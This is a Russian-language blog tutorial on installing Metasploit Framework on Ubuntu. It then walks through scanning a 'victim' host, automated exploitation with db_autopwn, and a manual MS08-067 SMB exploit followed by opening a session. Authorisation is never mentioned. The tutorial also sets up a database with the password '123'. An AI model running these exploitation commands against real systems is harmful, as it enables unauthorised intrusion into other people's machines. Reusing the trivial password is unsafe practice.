Metasploit Framework в Ubuntu

Metasploit Project — проект, посвященный информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплоитов. Наиболее известен проект Metasploit Framework — удобная платформа для создания и отладки эксплоитов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности. http://ru.wikipedia.org/wiki/Metasploit
В начале необходимо установить Metasploit Framework. Для этого поставим все необходимые пакеты. 
sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
sudo apt-get install subversion
sudo apt-get build-dep ruby
sudo apt-get install ruby-dev libpcap-dev
sudo apt-get install rubygems libsqlite3-dev
sudo gem install sqlite3-ruby
sudo apt-get install rubygems libmysqlclient-dev
sudo gem install mysql
Далее скачиваем Metasploit Framework вот тут: http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run: 
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod +x metasploit-latest-linux-installer.run
И запускаем… 
sudo ./metasploit-latest-linux-installer.run
После установки необходимо обновить Metasploit Framework 
sudo msfupdate
Теперь самый простой вариант использования Metasploit Framework. Запустим консоль. 
msfconsole
Теперь добавим нашу жертву в базу данных и информацию про его порты. 
db_nmap -sT -sV 192.168.1.1
Отправим все на автоматический взлом =). Данная команда стала неактуальной в последних версиях. 
db_autopwn -p -t -e
Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее. 
session -i 1
Альтернатив db_autopwn нет. Использовать эксплоиты можно в ручную. Например так: 
#Загружаем нужный нам эксплоит
use exploit/windows/smb/ms08_067_netapi
#Смотрим опции
show options
#Заполняем необходимые поля например IP адрес жертвы
set RHOST 192.168.84.58
#Проверяем актуален ли эксплоит для жертвы
check
#Ломаем
exploit
Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите: 
help
В конце для выхода обратно из сессии и удаления данного хоста из базы данных проделываем следующую операцию: 
exit
hosts -d 192.168.1.1
Иногда Базы данных отваливаются я решил данный вопрос вот так: 
sudo apt-get install postgresql
sudo apt-get install libpgsql-ruby
sudo su postgres
 createuser root -P
  Enter password for new role: 123
  Enter it again:123
  Shall the new role be a 
   superuser? (y/n) n
  Shall the new role be allowed to 
   create databases? (y/n) n
  Shall the new role be allowed to 
   create more new roles? (y/n) n
 createdb --owner=root metasploit
 exit
msfconsole
 db_connect root:123@127.0.0.1/metasploit

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

S.M.A.R.T. (часть 3). Расшифровка и понимание SMART атрибутов

Изображение
Маленький рассказ об S.M.A.R.T. атрибутах, их важности и понимании. В статье пойдет речь об расшифровке всех smart атрибутов ATA дисков. В предыдущих статьях речь шла об  мониторинге BBU  и  жестких SCSI дисков и их атрибутов под Megaraid контроллером . Теперь хочу немного описать атрибуты обычных АТА дисков на примере Seagate Barracuda ES.2 (ST31000340NS). Так же определим самые важные атрибуты, на которые нужно обращать внимание при мониторинге дисков используя smartctl. Для начала, можно убедиться, что наш диск поддерживает смарт 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 root@ s01:~ # smartctl -i /dev/sda smartctl 5.41 2011-06-09 r3365 [x86_64-linux-3.8.0-29-generic] ( local build) Copyright (C) 2002-11 by Bruce Allen, http: //smartmontools .sourceforge.net === START OF INFORMATION SECTION === Model Family:     Seagate Barracuda ES.2 Device Model:     ST31000340NS Serial Number:...
Далее...

S.M.A.R.T. (часть 2). Мониторинг BBU RAID контроллеров

Изображение
В  предыдущей статье  шла речь об установки megacli для мониторинга дисков под LSI 2108 Megaraid контроллеров. Сейчас же я хочу немного описать мониторинг батареи (BBU) для RAID контроллеров в целом. Какие шаги нужно предпринимать и как не наделать лишних проблем для себя при возникновении ошибок или неполадок с BBU (Battery Backup Unit). Состояние батареи нужно периодически проверять. Для RAID контроллеров этот компонент вообще может отсутствовать, так как его основное предназначение – это держать в кэше данные, которые еще не записались на диск, т.е. сохранение целостности данных при сбое питания (внезапное отключения подачи электричества). На данный момент, почти все рейд контроллеры поддерживают кэширование данных на уровне контроллера. Т.е. каждый физический диск имеет свой кэш плюс кэш контроллера. Такой подход повышает производительность системы при сохранение большого количества данных или же при очень высоком уровне отдачи контента конечным пользователям. Ес...
Далее...

Работаем с RAID в Debian на HP Proliant DL580

Изображение
В этой заметке пойдёт речь о работе с RAID контроллером сервера HP Proliant DL580 G7 в операционной системе Debian GNU/Linux 7. Подготовка Чтобы научить Debian обращаться к RAID-контроллеру будет необходимо доставить кое-какой проприетарный софт. Т.к. у меня нет возможности подцепить репозитарий HP в Интернете, то необходимые пакеты просто закачаем: wget -r -l 1 -nd -k -np -A "*amd64.deb" http://downloads.linux.hp.com/SDR/repo/mcp/Debian/pool/non-free/ wget -r -l 1 -nd -k -np -A "*all.deb" http://downloads.linux.hp.com/SDR/repo/mcp/Debian/pool/non-free/ Описание софта: cpqacuxe_9.40.2-2._amd64.deb HP Array Configuration Utility, cpqacuxe — утилита управления RAID-контроллером через web-интерфейс. Является расширением для hpsmh (об этом ниже). hpacucli_9.40.1-1._amd64.deb HP Command Line Array Configuration Utility, hpacucli – консольная утилита управления RAID-контроллером. Её мы поставим в первую очередь. hp-ams_1.4.2-1114.2_amd64.deb Age...
Далее...